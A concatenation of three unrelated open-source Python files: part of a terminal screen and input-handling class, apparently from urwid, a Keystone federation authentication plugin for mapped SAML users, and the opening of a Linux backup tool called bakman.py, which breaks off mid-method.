After calling this function get_input will include mouse
click events along with keystrokes.
"""
enable = bool(enable)
if enable == self._mouse_tracking_enabled:
return
self._mouse_tracking(enable)
self._mouse_tracking_enabled = enable
def _mouse_tracking(self, enable):
if enable:
self.write(escape.MOUSE_TRACKING_ON)
self._start_gpm_tracking()
else:
self.write(escape.MOUSE_TRACKING_OFF)
self._stop_gpm_tracking()
def _start_gpm_tracking(self):
if not os.path.isfile("/usr/bin/mev"):
return
if not os.environ.get('TERM',"").lower().startswith("linux"):
return
if not Popen:
return
m = Popen(["/usr/bin/mev","-e","158"], stdin=PIPE, stdout=PIPE,
close_fds=True)
fcntl.fcntl(m.stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
self.gpm_mev = m
def _stop_gpm_tracking(self):
if not self.gpm_mev:
return
os.kill(self.gpm_mev.pid, signal.SIGINT)
os.waitpid(self.gpm_mev.pid, 0)
self.gpm_mev = None
def _start(self, alternate_buffer=True):
"""
Initialize the screen and input mode.
alternate_buffer -- use alternate screen buffer
"""
if alternate_buffer:
self.write(escape.SWITCH_TO_ALTERNATE_BUFFER)
self._rows_used = None
else:
self._rows_used = 0
fd = self._term_input_file.fileno()
if os.isatty(fd):
self._old_termios_settings = termios.tcgetattr(fd)
tty.setcbreak(fd)
self.signal_init()
self._alternate_buffer = alternate_buffer
self._next_timeout = self.max_wait
if not self._signal_keys_set:
self._old_signal_keys = self.tty_signal_keys(fileno=fd)
signals.emit_signal(self, INPUT_DESCRIPTORS_CHANGED)
# restore mouse tracking to previous state
self._mouse_tracking(self._mouse_tracking_enabled)
return super(Screen, self)._start()
def _stop(self):
"""
Restore the screen.
"""
self.clear()
signals.emit_signal(self, INPUT_DESCRIPTORS_CHANGED)
self.signal_restore()
fd = self._term_input_file.fileno()
if os.isatty(fd):
termios.tcsetattr(fd, termios.TCSADRAIN,
self._old_termios_settings)
self._mouse_tracking(False)
move_cursor = ""
if self._alternate_buffer:
move_cursor = escape.RESTORE_NORMAL_BUFFER
elif self.maxrow is not None:
move_cursor = escape.set_cursor_position(
0, self.maxrow)
self.write(
self._attrspec_to_escape(AttrSpec('',''))
+ escape.SI
+ move_cursor
+ escape.SHOW_CURSOR)
if self._old_signal_keys:
self.tty_signal_keys(*(self._old_signal_keys + (fd,)))
super(Screen, self)._stop()
def write(self, data):
"""Write some data to the terminal.
You may wish to override this if you're using something other than
regular files for input and output.
"""
self._term_output_file.write(data)
def flush(self):
"""Flush the output buffer.
You may wish to override this if you're using something other than
regular files for input and output.
"""
self._term_output_file.flush()
def get_input(self, raw_keys=False):
"""Return pending input as a list.
raw_keys -- return raw keycodes as well as translated versions
This function will immediately return all the input since the
last time it was called. If there is no input pending it will
wait before returning an empty list. The wait time may be
configured with the set_input_timeouts function.
If raw_keys is False (default) this function will return a list
of keys pressed. If raw_keys is True this function will return
a ( keys pressed, raw keycodes ) tuple instead.
Examples of keys returned:
* ASCII printable characters: " ", "a", "0", "A", "-", "/"
* ASCII control characters: "tab", "enter"
* Escape sequences: "up", "page up", "home", "insert", "f1"
* Key combinations: "shift f1", "meta a", "ctrl b"
* Window events: "window resize"
When a narrow encoding is not enabled:
* "Extended ASCII" characters: "\\xa1", "\\xb2", "\\xfe"
When a wide encoding is enabled:
* Double-byte characters: "\\xa1\\xea", "\\xb2\\xd4"
When utf8 encoding is enabled:
* Unicode characters: u"\\u00a5", u'\\u253c"
Examples of mouse events returned:
* Mouse button press: ('mouse press', 1, 15, 13),
('meta mouse press', 2, 17, 23)
* Mouse drag: ('mouse drag', 1, 16, 13),
('mouse drag', 1, 17, 13),
('ctrl mouse drag', 1, 18, 13)
* Mouse button release: ('mouse release', 0, 18, 13),
('ctrl mouse release', 0, 17, 23)
"""
assert self._started
self._wait_for_input_ready(self._next_timeout)
keys, raw = self.parse_input(None, None, self.get_available_raw_input())
# Avoid pegging CPU at 100% when slowly resizing
if keys==['window resize'] and self.prev_input_resize:
while True:
self._wait_for_input_ready(self.resize_wait)
keys, raw2 = self.parse_input(None, None, self.get_available_raw_input())
raw += raw2
#if not keys:
# keys, raw2 = self._get_input(
# self.resize_wait)
# raw += raw2
if keys!=['window resize']:
break
if keys[-1:]!=['window resize']:
keys.append('window resize')
if keys==['window resize']:
self.prev_input_resize = 2
elif self.prev_input_resize == 2 and not keys:
self.prev_input_resize = 1
else:
self.prev_input_resize = 0
if raw_keys:
return keys, raw
return keys
def get_input_descriptors(self):
"""
Return a list of integer file descriptors that should be
polled in external event loops to check for user input.
Use this method if you are implementing your own event loop.
"""
if not self._started:
return []
fd_list = [self._term_input_file.fileno(), self._resize_pipe_rd]
if self.gpm_mev is not None:
fd_list.append(self.gpm_mev.stdout.fileno())
return fd_list
_current_event_loop_handles = ()
def unhook_event_loop(self, event_loop):
"""
Remove any hooks added by hook_event_loop.
"""
for handle in self._current_event_loop_handles:
event_loop.remove_watch_file(handle)
if self._input_timeout:
event_loop.remove_alarm(self._input_timeout)
self._input_timeout = None
def hook_event_loop(self, event_loop, callback):
"""
Register the given callback with the event loop, to be called with new
input whenever it's available. The callback should be passed a list of
processed keys and a list of unprocessed keycodes.
Subclasses may wish to use parse_input to wrap the callback.
"""
if hasattr(self, 'get_input_nonblocking'):
wrapper = self._make_legacy_input_wrapper(event_loop, callback)
else:
wrapper = lambda: self.parse_input(
event_loop, callback, self.get_available_raw_input())
fds = self.get_input_descriptors()
handles = []
for fd in fds:
event_loop.watch_file(fd, wrapper)
self._current_event_loop_handles = handles
_input_timeout = None
_partial_codes = None
def _make_legacy_input_wrapper(self, event_loop, callback):
"""
Support old Screen classes that still have a get_input_nonblocking and
expect it to work.
"""
def wrapper():
if self._input_timeout:
event_loop.remove_alarm(self._input_timeout)
self._input_timeout = None
timeout, keys, raw = self.get_input_nonblocking()
if timeout is not None:
self._input_timeout = event_loop.alarm(timeout, wrapper)
callback(keys, raw)
return wrapper
def get_available_raw_input(self):
"""
Return any currently-available input. Does not block.
This method is only used by the default `hook_event_loop`
implementation; you can safely ignore it if you implement your own.
"""
codes = self._get_gpm_codes() + self._get_keyboard_codes()
if self._partial_codes:
codes = self._partial_codes + codes
self._partial_codes = None
# clean out the pipe used to signal external event loops
# that a resize has occurred
try:
while True: os.read(self._resize_pipe_rd, 1)
except OSError:
pass
return codes
def parse_input(self, event_loop, callback, codes, wait_for_more=True):
"""
Read any available input from get_available_raw_input, parses it into
keys, and calls the given callback.
The current implementation tries to avoid any assumptions about what
the screen or event loop look like; it only deals with parsing keycodes
and setting a timeout when an incomplete one is detected.
`codes` should be a sequence of keycodes, i.e. bytes. A bytearray is
appropriate, but beware of using bytes, which only iterates as integers
on Python 3.
"""
# Note: event_loop may be None for 100% synchronous support, only used
# by get_input. Not documented because you shouldn't be doing it.
if self._input_timeout and event_loop:
event_loop.remove_alarm(self._input_timeout)
self._input_timeout = None
original_codes = codes
processed = []
try:
while codes:
run, codes = escape.process_keyqueue(
codes, wait_for_more)
processed.extend(run)
except escape.MoreInputRequired:
# Set a timer to wait for the rest of the input; if it goes off
# without any new input having come in, use the partial input
k = len(original_codes) - len(codes)
processed_codes = original_codes[:k]
self._partial_codes = codes
def _parse_incomplete_input():
self._input_timeout = None
self._partial_codes = None
self.parse_input(
event_loop, callback, codes, wait_for_more=False)
if event_loop:
self._input_timeout = event_loop.alarm(
self.complete_wait, _parse_incomplete_input)
else:
processed_codes = original_codes
self._partial_codes = None
if self._resized:
processed.append('window resize')
self._resized = False
if callback:
callback(processed, processed_codes)
else:
# For get_input
return processed, processed_codes
def _get_keyboard_codes(self):
codes = []
while True:
code = self._getch_nodelay()
if code < 0:
break
codes.append(code)
return codes
def _get_gpm_codes(self):
codes = []
try:
while self.gpm_mev is not None and self.gpm_event_pending:
codes.extend(self._encode_gpm_event())
except IOError as e:
if e.args[0] != 11:
raise
return codes
def _wait_for_input_ready(self, timeout):
ready = None
fd_list = [self._term_input_file.fileno()]
if self.gpm_mev is not None:
fd_list.append(self.gpm_mev.stdout.fileno())
while True:
try:
if timeout is None:
ready,w,err = select.select(
fd_list, [], fd_list)
else:
ready,w,err = select.select(
fd_list,[],fd_list, timeout)
break
except select.error as e:
if e.args[0] != 4:
raise
if self._resized:
ready = []
break
return ready
def _getch(self, timeout):
ready = self._wait_for_input_ready(timeout)
if self.gpm_mev is not None:
if self.gpm_mev.stdout.fileno() in ready:
self.gpm_event_pending = True
if self._term_input_file.fileno() in ready:
return ord(os.read(self._term_input_file.fileno(), 1))
return -1
def _encode_gpm_event( self ):
self.gpm_event_pending = False
s = self.gpm_mev.stdout.readline().decode('ascii')
l = s.split(",")
if len(l) != 6:
# unexpected output, stop tracking
self._stop_gpm_tracking()
signals.emit_signal(self, INPUT_DESCRIPTORS_CHANGED)
return []
ev, x, y, ign, b, m = s.split(",")
ev = int( ev.split("x")[-1], 16)
x = int( x.split(" ")[-1] )
y = int( y.lstrip().split(" ")[0] )
b = int( b.split(" ")[-1] )
m = int( m.split("x")[-1].rstrip(), 16 )
# convert to xterm-like escape sequence
last = next = self.last_bstate
l = []
mod = 0
if m & 1: mod |= 4 # shift
if m & 10: mod |= 8 # alt
if m & 4: mod |= 16 # ctrl
def append_button( b ):
b |= mod
l.extend([ 27, ord('['), ord('M'), b+32, x+32, y+32 ])
def determine_button_release( flag ):
if b & 4 and last & 1:
append_button( 0 + flag )
next |= 1
if b & 2 and last & 2:
append_button( 1 + flag )
next |= 2
if b & 1 and last & 4:
append_button( 2 + flag )
next |= 4
if ev == 20 or ev == 36 or ev == 52: # press
if b & 4 and last & 1 == 0:
append_button( 0 )
next |= 1
if b & 2 and last & 2 == 0:
append_button( 1 )
next |= 2
if b & 1 and last & 4 == 0:
append_button( 2 )
next |= 4
elif ev == 146: # drag
if b & 4:
append_button( 0 + escape.MOUSE_DRAG_FLAG )
elif b & 2:
append_button( 1 + escape.MOUSE_DRAG_FLAG )
elif b & 1:
append_button( 2 + escape.MOUSE_DRAG_FLAG )
else: # release
if b & 4 and last & 1:
append_button( 0 + escape.MOUSE_RELEASE_FLAG )
next &= ~ 1
if b & 2 and last & 2:
append_button( 1 + escape.MOUSE_RELEASE_FLAG )
next &= ~ 2
if b & 1 and last & 4:
append_button( 2 + escape.MOUSE_RELEASE_FLAG )
next &= ~ 4
if ev == 40: # double click (release)
if b & 4 and last & 1:
append_button( 0 + escape.MOUSE_MULTIPLE_CLICK_FLAG )
if b & 2 and last & 2:
append_button( 1 + escape.MOUSE_MULTIPLE_CLICK_FLAG )
if b & 1 and last & 4:
append_button( 2 + escape.MOUSE_MULTIPLE_CLICK_FLAG )
elif ev == 52:
if b & 4 and last & 1:
append_button( 0 + escape.MOUSE_MULTIPLE_CLICK_FLAG*2 )
if b & 2 and last & 2:
append_button( 1 + escape.MOUSE_MULTIPLE_CLICK_FLAG*2 )
if b & 1 and last & 4:
append_button( 2 + escape.MOUSE_MULTIPLE_CLICK_FLAG*2 )
self.last_bstate = next
return l
def _getch_nodelay(self):
return self._getch(0)
def get_cols_rows(self):
"""Return the terminal dimensions (num columns, num rows)."""
y, x = 80, 24
try:
buf = fcntl.ioctl(self._term_output_file.fileno(),
termios.TIOCGWINSZ, ' '*4)
y, x = struct.unpack('hh', buf)
except IOError:
# Term size could not be determined
pass
self.maxrow = y
return x, y
def _setup_G1(self):
"""
Initialize the G1 character set to graphics mode if required.
"""
if self._setup_G1_done:
return
while True:
try:
self.write(escape.DESIGNATE_G1_SPECIAL)
self.flush()
break
except IOError:
pass
self._setup_G1_done = True
def draw_screen(self, (maxcol, maxrow), r ):
"""Paint screen with rendered canvas."""
assert self._started
assert maxrow == r.rows()
# quick return if nothing has changed
if self.screen_buf and r is self._screen_buf_canvas:
return
self._setup_G1()
if self._resized:
# handle resize before trying to draw screen
return
o = [escape.HIDE_CURSOR, self._attrspec_to_escape(AttrSpec('',''))]
def partial_display():
# returns True if the screen is in partial display mode
# ie. only some rows belong to the display
return self._rows_used is not None
if not partial_display():
o.append(escape.CURSOR_HOME)
if self.screen_buf:
osb = self.screen_buf
else:
osb = []
sb = []
cy = self._cy
y = -1
def set_cursor_home():
if not partial_display():
return escape.set_cursor_position(0, 0)
return (escape.CURSOR_HOME_COL +
escape.move_cursor_up(cy))
def set_cursor_row(y):
if not partial_display():
return escape.set_cursor_position(0, y)
return escape.move_cursor_down(y - cy)
def set_cursor_position(x, y):
if not partial_display():
return escape.set_cursor_position(x, y)
if cy > y:
return ('\b' + escape.CURSOR_HOME_COL +
escape.move_cursor_up(cy - y) +
escape.move_cursor_right(x))
return ('\b' + escape.CURSOR_HOME_COL +
escape.move_cursor_down(y - cy) +
escape.move_cursor_right(x))
def is_blank_row(row):
if len(row) > 1:
return False
if row[0][2].strip():
return False
return True
def attr_to_escape(a):
if a in self._pal_escape:
return self._pal_escape[a]
elif isinstance(a, AttrSpec):
return self._attrspec_to_escape(a)
# undefined attributes use default/default
# TODO: track and report these
return self._attrspec_to_escape(
AttrSpec('default','default'))
def using_standout(a):
a = self._pal_attrspec.get(a, a)
return isinstance(a, AttrSpec) and a.standout
ins = None
o.append(set_cursor_home())
cy = 0
for row in r.content():
y += 1
if osb and osb[y] == row:
# this row of the screen buffer matches what is
# currently displayed, so we can skip this line
sb.append( osb[y] )
continue
sb.append(row)
# leave blank lines off display when we are using
# the default screen buffer (allows partial screen)
if partial_display() and y > self._rows_used:
if is_blank_row(row):
continue
self._rows_used = y
if y or partial_display():
o.append(set_cursor_position(0, y))
# after updating the line we will be just over the
# edge, but terminals still treat this as being
# on the same line
cy = y
whitespace_at_end = False
if row:
a, cs, run = row[-1]
if (run[-1:] == B(' ') and self.back_color_erase
and not using_standout(a)):
whitespace_at_end = True
row = row[:-1] + [(a, cs, run.rstrip(B(' ')))]
elif y == maxrow-1 and maxcol > 1:
row, back, ins = self._last_row(row)
first = True
lasta = lastcs = None
for (a,cs, run) in row:
assert isinstance(run, bytes) # canvases should render with bytes
if cs != 'U':
run = run.translate(UNPRINTABLE_TRANS_TABLE)
if first or lasta != a:
o.append(attr_to_escape(a))
lasta = a
if first or lastcs != cs:
assert cs in [None, "0", "U"], repr(cs)
if lastcs == "U":
o.append( escape.IBMPC_OFF )
if cs is None:
o.append( escape.SI )
elif cs == "U":
o.append( escape.IBMPC_ON )
else:
o.append( escape.SO )
lastcs = cs
o.append( run )
first = False
if ins:
(inserta, insertcs, inserttext) = ins
ias = attr_to_escape(inserta)
assert insertcs in [None, "0", "U"], repr(insertcs)
if cs is None:
icss = escape.SI
elif cs == "U":
icss = escape.IBMPC_ON
else:
icss = escape.SO
o += [ "\x08"*back,
ias, icss,
escape.INSERT_ON, inserttext,
escape.INSERT_OFF ]
if cs == "U":
o.append(escape.IBMPC_OFF)
if whitespace_at_end:
o.append(escape.ERASE_IN_LINE_RIGHT)
if r.cursor is not None:
x,y = r.cursor
o += [set_cursor_position(x, y),
escape.SHOW_CURSOR ]
self._cy = y
if self._resized:
# handle resize before trying to draw screen
return
try:
for l in o:
if isinstance(l, bytes) and PYTHON3:
l = l.decode('utf-8')
self.write(l)
self.flush()
except IOError as e:
# ignore interrupted syscall
if e.args[0] != 4:
raise
self.screen_buf = sb
self._screen_buf_canvas = r
def _last_row(self, row):
"""On the last row we need to slide the bottom right character
into place. Calculate the new line, attr and an insert sequence
to do that.
eg. last row:
XXXXXXXXXXXXXXXXXXXXYZ
Y will be drawn after Z, shifting Z into position.
"""
new_row = row[:-1]
z_attr, z_cs, last_text = row[-1]
last_cols = util.calc_width(last_text, 0, len(last_text))
last_offs, z_col = util.calc_text_pos(last_text, 0,
len(last_text), last_cols-1)
if last_offs == 0:
z_text = last_text
del new_row[-1]
# we need another segment
y_attr, y_cs, nlast_text = row[-2]
nlast_cols = util.calc_width(nlast_text, 0,
len(nlast_text))
z_col += nlast_cols
nlast_offs, y_col = util.calc_text_pos(nlast_text, 0,
len(nlast_text), nlast_cols-1)
y_text = nlast_text[nlast_offs:]
if nlast_offs:
new_row.append((y_attr, y_cs,
nlast_text[:nlast_offs]))
else:
z_text = last_text[last_offs:]
y_attr, y_cs = z_attr, z_cs
nlast_cols = util.calc_width(last_text, 0,
last_offs)
nlast_offs, y_col = util.calc_text_pos(last_text, 0,
last_offs, nlast_cols-1)
y_text = last_text[nlast_offs:last_offs]
if nlast_offs:
new_row.append((y_attr, y_cs,
last_text[:nlast_offs]))
new_row.append((z_attr, z_cs, z_text))
return new_row, z_col-y_col, (y_attr, y_cs, y_text)
def clear(self):
"""
Force the screen to be completely repainted on the next
call to draw_screen().
"""
self.screen_buf = None
self.setup_G1 = True
def _attrspec_to_escape(self, a):
"""
Convert AttrSpec instance a to an escape sequence for the terminal
>>> s = Screen()
>>> s.set_terminal_properties(colors=256)
>>> a2e = s._attrspec_to_escape
>>> a2e(s.AttrSpec('brown', 'dark green'))
'\\x1b[0;33;42m'
>>> a2e(s.AttrSpec('#fea,underline', '#d0d'))
'\\x1b[0;38;5;229;4;48;5;164m'
"""
if a.foreground_high:
fg = "38;5;%d" % a.foreground_number
elif a.foreground_basic:
if a.foreground_number > 7:
if self.fg_bright_is_bold:
fg = "1;%d" % (a.foreground_number - 8 + 30)
else:
fg = "%d" % (a.foreground_number - 8 + 90)
else:
fg = "%d" % (a.foreground_number + 30)
else:
fg = "39"
st = ("1;" * a.bold + "4;" * a.underline +
"5;" * a.blink + "7;" * a.standout)
if a.background_high:
bg = "48;5;%d" % a.background_number
elif a.background_basic:
if a.background_number > 7:
if self.bg_bright_is_blink:
bg = "5;%d" % (a.background_number - 8 + 40)
else:
# this doesn't work on most terminals
bg = "%d" % (a.background_number + 100)
else:
bg = "%d" % (a.background_number + 40)
else:
bg = "49"
return escape.ESC + "[0;%s;%s%sm" % (fg, st, bg)
def set_terminal_properties(self, colors=None, bright_is_bold=None,
has_underline=None):
"""
colors -- number of colors terminal supports (1, 16, 88 or 256)
or None to leave unchanged
bright_is_bold -- set to True if this terminal uses the bold
setting to create bright colors (numbers 8-15), set to False
if this Terminal can create bright colors without bold or
None to leave unchanged
has_underline -- set to True if this terminal can use the
underline setting, False if it cannot or None to leave
unchanged
"""
if colors is None:
colors = self.colors
if bright_is_bold is None:
bright_is_bold = self.fg_bright_is_bold
if has_underline is None:
has_underline = self.has_underline
if colors == self.colors and bright_is_bold == self.fg_bright_is_bold \
and has_underline == self.has_underline:
return
self.colors = colors
self.fg_bright_is_bold = bright_is_bold
self.has_underline = has_underline
self.clear()
self._pal_escape = {}
for p,v in self._palette.items():
self._on_update_palette_entry(p, *v)
def reset_default_terminal_palette(self):
"""
Attempt to set the terminal palette to default values as taken
from xterm. Uses number of colors from current
set_terminal_properties() screen setting.
"""
if self.colors == 1:
return
def rgb_values(n):
if self.colors == 16:
aspec = AttrSpec("h%d"%n, "", 256)
else:
aspec = AttrSpec("h%d"%n, "", self.colors)
return aspec.get_rgb_values()[:3]
entries = [(n,) + rgb_values(n) for n in range(self.colors)]
self.modify_terminal_palette(entries)
def modify_terminal_palette(self, entries):
"""
entries - list of (index, red, green, blue) tuples.
Attempt to set part of the terminal palette (this does not work
on all terminals.) The changes are sent as a single escape
sequence so they should all take effect at the same time.
0 <= index < 256 (some terminals will only have 16 or 88 colors)
0 <= red, green, blue < 256
"""
modify = ["%d;rgb:%02x/%02x/%02x" % (index, red, green, blue)
for index, red, green, blue in entries]
self.write("\x1b]4;"+";".join(modify)+"\x1b\\")
self.flush()
# shortcut for creating an AttrSpec with this screen object's
# number of colors
AttrSpec = lambda self, fg, bg: AttrSpec(fg, bg, self.colors)
def _test():
import doctest
doctest.testmod()
if __name__=='__main__':
_test()
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo.serialization import jsonutils
from pycadf import cadftaxonomy as taxonomy
from six.moves.urllib import parse
from keystone import auth
from keystone.common import dependency
from keystone.contrib import federation
from keystone.contrib.federation import utils
from keystone import exception
from keystone.i18n import _
from keystone.models import token_model
from keystone import notifications
from keystone.openstack.common import log
LOG = log.getLogger(__name__)
@dependency.requires('assignment_api', 'federation_api', 'identity_api',
'token_provider_api')
class Mapped(auth.AuthMethodHandler):
def _get_token_ref(self, auth_payload):
token_id = auth_payload['id']
response = self.token_provider_api.validate_token(token_id)
return token_model.KeystoneToken(token_id=token_id,
token_data=response)
def authenticate(self, context, auth_payload, auth_context):
"""Authenticate mapped user and return an authentication context.
:param context: keystone's request context
:param auth_payload: the content of the authentication for a
given method
:param auth_context: user authentication context, a dictionary
shared by all plugins.
In addition to ``user_id`` in ``auth_context``, this plugin sets
``group_ids``, ``OS-FEDERATION:identity_provider`` and
``OS-FEDERATION:protocol``
"""
if 'id' in auth_payload:
token_ref = self._get_token_ref(auth_payload)
handle_scoped_token(context, auth_payload, auth_context, token_ref,
self.federation_api,
self.identity_api,
self.token_provider_api)
else:
handle_unscoped_token(context, auth_payload, auth_context,
self.assignment_api, self.federation_api,
self.identity_api)
def handle_scoped_token(context, auth_payload, auth_context, token_ref,
federation_api, identity_api, token_provider_api):
utils.validate_expiration(token_ref)
token_audit_id = token_ref.audit_id
identity_provider = token_ref.federation_idp_id
protocol = token_ref.federation_protocol_id
user_id = token_ref.user_id
group_ids = token_ref.federation_group_ids
send_notification = functools.partial(
notifications.send_saml_audit_notification, 'authenticate',
context, user_id, group_ids, identity_provider, protocol,
token_audit_id)
try:
mapping = federation_api.get_mapping_from_idp_and_protocol(
identity_provider, protocol)
utils.validate_groups(group_ids, mapping['id'], identity_api)
except Exception:
# NOTE(topol): Diaper defense to catch any exception, so we can
# send off failed authentication notification, raise the exception
# after sending the notification
send_notification(taxonomy.OUTCOME_FAILURE)
raise
else:
send_notification(taxonomy.OUTCOME_SUCCESS)
auth_context['user_id'] = user_id
auth_context['group_ids'] = group_ids
auth_context[federation.IDENTITY_PROVIDER] = identity_provider
auth_context[federation.PROTOCOL] = protocol
def handle_unscoped_token(context, auth_payload, auth_context,
assignment_api, federation_api, identity_api):
assertion = extract_assertion_data(context)
identity_provider = auth_payload['identity_provider']
protocol = auth_payload['protocol']
group_ids = None
# NOTE(topol): The user is coming in from an IdP with a SAML assertion
# instead of from a token, so we set token_id to None
token_id = None
# NOTE(marek-denis): This variable is set to None and there is a
# possibility that it will be used in the CADF notification. This means
# operation will not be mapped to any user (even ephemeral).
user_id = None
try:
mapped_properties = apply_mapping_filter(identity_provider, protocol,
assertion, assignment_api,
federation_api, identity_api)
user_id = setup_username(context, mapped_properties)
group_ids = mapped_properties['group_ids']
except Exception:
# NOTE(topol): Diaper defense to catch any exception, so we can
# send off failed authentication notification, raise the exception
# after sending the notification
outcome = taxonomy.OUTCOME_FAILURE
notifications.send_saml_audit_notification('authenticate', context,
user_id, group_ids,
identity_provider,
protocol, token_id,
outcome)
raise
else:
outcome = taxonomy.OUTCOME_SUCCESS
notifications.send_saml_audit_notification('authenticate', context,
user_id, group_ids,
identity_provider,
protocol, token_id,
outcome)
auth_context['user_id'] = user_id
auth_context['group_ids'] = group_ids
auth_context[federation.IDENTITY_PROVIDER] = identity_provider
auth_context[federation.PROTOCOL] = protocol
def extract_assertion_data(context):
assertion = dict(utils.get_assertion_params_from_env(context))
return assertion
def apply_mapping_filter(identity_provider, protocol, assertion,
assignment_api, federation_api, identity_api):
mapping = federation_api.get_mapping_from_idp_and_protocol(
identity_provider, protocol)
rules = jsonutils.loads(mapping['rules'])
LOG.debug('using the following rules: %s', rules)
rule_processor = utils.RuleProcessor(rules)
mapped_properties = rule_processor.process(assertion)
# NOTE(marek-denis): We update group_ids only here to avoid fetching
# groups identified by name/domain twice.
# NOTE(marek-denis): Groups are translated from name/domain to their
# corresponding ids in the auth plugin, as we need information what
# ``mapping_id`` was used as well as idenity_api and assignment_api
# objects.
group_ids = mapped_properties['group_ids']
utils.validate_groups_in_backend(group_ids,
mapping['id'],
identity_api)
group_ids.extend(
utils.transform_to_group_ids(
mapped_properties['group_names'], mapping['id'],
identity_api, assignment_api))
utils.validate_groups_cardinality(group_ids, mapping['id'])
mapped_properties['group_ids'] = list(set(group_ids))
return mapped_properties
def setup_username(context, mapped_properties):
"""Setup federated username.
If ``user_name`` is specified in the mapping_properties use this
value.Otherwise try fetching value from an environment variable
``REMOTE_USER``.
This method also url encodes user_name and saves this value in user_id.
If user_name cannot be mapped raise exception.Unauthorized.
:param context: authentication context
:param mapped_properties: Properties issued by a RuleProcessor.
:type: dictionary
:raises: exception.Unauthorized
:returns: tuple with user_name and user_id values.
"""
user_name = mapped_properties['name']
if user_name is None:
user_name = context['environment'].get('REMOTE_USER')
if user_name is None:
raise exception.Unauthorized(_("Could not map user"))
user_id = parse.quote(user_name)
return user_id
| |
#!/usr/bin/env python
"""
bakman.py is a generic Linux backup tool. Backups are defined in a
Python-based configuration file as a set of parts that can be run
invidually or in any seqeuence. Each part consists of one or more
steps that typically include mount, running of a backup, and unmount
actions.
bakman.py can both run simple backups of one or several partitions
into a single pre-mounted location, or it can create a mirror image of
the disk being backed up onto a separate "clone" disk. It can mount
encrypted or unencrypted volumes and partitions on the fly as needed.
"""
__author__ = 'Juerg Beringer'
__version__ = '$Id: bakman.py 2241 2017-10-18 02:19:20Z jb $'
__usage__ = """%prog [options] cmd [cmdargs...]
Examples:
bakman list list configurations (* means config is available)
bakman list bakdisk5 list parts in configuration bakdisk5 (* means part is available)
bakman dump bakdisk5 show details of bakdisk5 backup configuration
bakman -v run bakdisk5 run bakdisk5 backup with progress updates
bakman -v -V run bakdisk5 dito but show also all files being transferred
bakman -v --debug --dryrun run bakdisk5
dito, but instead of executing commands show what would
be excecutedx
bakman -e jb --batch bakdisk5 winhome
run part winhome of bakdisk5 backup without confirmation
dialog, then e-mail log to local user jb
bakman -m /bakman mount clonedisk3
mount all parts in clonedisk3 configuration under /bakman/clonedisk3
Commands are:
list list defined backup configurations
list NAME list parts in backup configuration NAME
dump NAME dump backup configuration NAME
run NAME [part...] run (including mount/unmount) all or selected part in configuration NAME
mount NAME [part...] mount all or selected part in configuration NAME
unmount NAME [part...] unmount all or selected part in configuration NAME
debug enter interactive debug mode
"""
import os
import sys
import commands
import time
import logging
import cmdhelper
from cmdhelper import *
#
# Default configuration and log files
#
try:
# If config and log files are kept under $UEADM
UEADM = os.environ['UEADM']
EXCLUDEPATTERN = '$UEADM/etc/bakman.exclude'
LOGFILE = '$UEADM/log/bakman.log'
CONFIGFILE = '$UEADM/etc/bakman.conf.py'
DATEFILE = '$UEADM/log/bakman.dates'
except:
# General case: .bakman in user's home dir
UEADM = os.path.join(os.path.expanduser('~'),'.bakman')
EXCLUDEPATTERN = os.path.join(UEADM,'bakman.exclude')
LOGFILE = os.path.join(UEADM,'bakman.log')
CONFIGFILE = os.path.join(UEADM,'bakman.conf.py')
DATEFILE = os.path.join(UEADM,'bakman.dates')
#
# Generic utility functions
#
def checkSource(srcPath):
"""Return True if srcPath exists and is not empty."""
if not os.path.exists(srcPath):
return False
return os.listdir(srcPath)!=[]
def checkDest(dstPath,isMountPoint=False):
"""Return True if dstPath exists and, if isMountPoint is True, is a mount point."""
if not os.path.exists(dstPath):
return False
if isMountPoint and not os.path.ismount(dstPath):
return False # Only mount dir exists, but nothing is mounted there
return True
#
# Classes for backup configuration and steps
#
class StepException(Exception):
"""Exception class that logs all exceptions occuring in steps."""
class Step:
"""Base class for all backup steps."""
def __init__(self, keepAlive=False):
self.keepAlive = keepAlive
self.parentConfig = None
self.mountPoint = None
def setParentConfig(self,parentConfig):
"""Set parent BackupConfiguration instance."""
self.parentConfig = parentConfig
if self.mountPoint is None:
self.mountPoint = self.mountPath()
def __str__(self):
"""Return string with brief info about step."""
return 'step base class'
def device(self, devinfo=None):
"""Return path to device based on parent configuration."""
return self.parentConfig.device(devinfo)
def mountPath(self, relPath=None, path=None):
"""Determine path using parent configuration and given paths.
If path is set, return path. Otherwise the mount point is
determined from options.mountBase or the mountBase set in the
parent BackupConfiguration, the name of the parent
configuration, and relPath, if given."""
if path is not None:
return path
mountBase = options.mountBase
if mountBase is None:
mountBase = self.parentConfig.mountBase
if mountBase is None:
mountBase = '/media'
p = [ mountBase ]
try:
p.append(self.parentConfig.name)
except:
p.append('UNKNOWN')
warning('mountPath called without parent configuration in step of class %s' % self.__class__.__name__)
if relPath is not None:
p.append(relPath)
return os.path.sep.join(p)
def isAvailable(self):
"""Return True if step can be done (virtual)."""
return True
def mount(self):
"""Mount or attach device (virtual)."""
pass
def run(self):
"""Carry out the backup (virtual)."""
pass
def unmount(self):
"""Unmount or detach device (virtual)."""
pass
class Mount(Step):
"""Mount a partition."""
def __init__(self, relPath, devinfo, mountOpts='', keepAlive=False, sleepBeforeUnmount=0):
"""Create mount step.
If relPath is not empty, it will be appended to the default mount point.
devinfo is either a device or a partition number for the disk
defined in the parent configuration."""
Step.__init__(self,keepAlive)
self.relPath = relPath
self.devinfo = devinfo
self.mountOpts = '-o %s' % mountOpts if mountOpts else ''
self.sleepBeforeUnmount = sleepBeforeUnmount
def setParentConfig(self,parentConfig):
Step.setParentConfig(self,parentConfig)
if self.relPath:
self.mountPoint = os.path.join(self.mountPoint,self.relPath)
def __str__(self):
device = self.device(self.devinfo)
return 'Mount %s --> %s (options: %s)' % (device,self.mountPoint,self.mountOpts)
def isAvailable(self):
"""Return true if device to be mounted is available.
If the device path determined from self.devinfo and the parent configuration is
not an absolute path, return True assuming that the device availability is being
checked by a previous step."""
device = self.device(self.devinfo)
if device[:10] == '/dev/disk/':
return os.path.exists(device)
else:
return True
def mount(self):
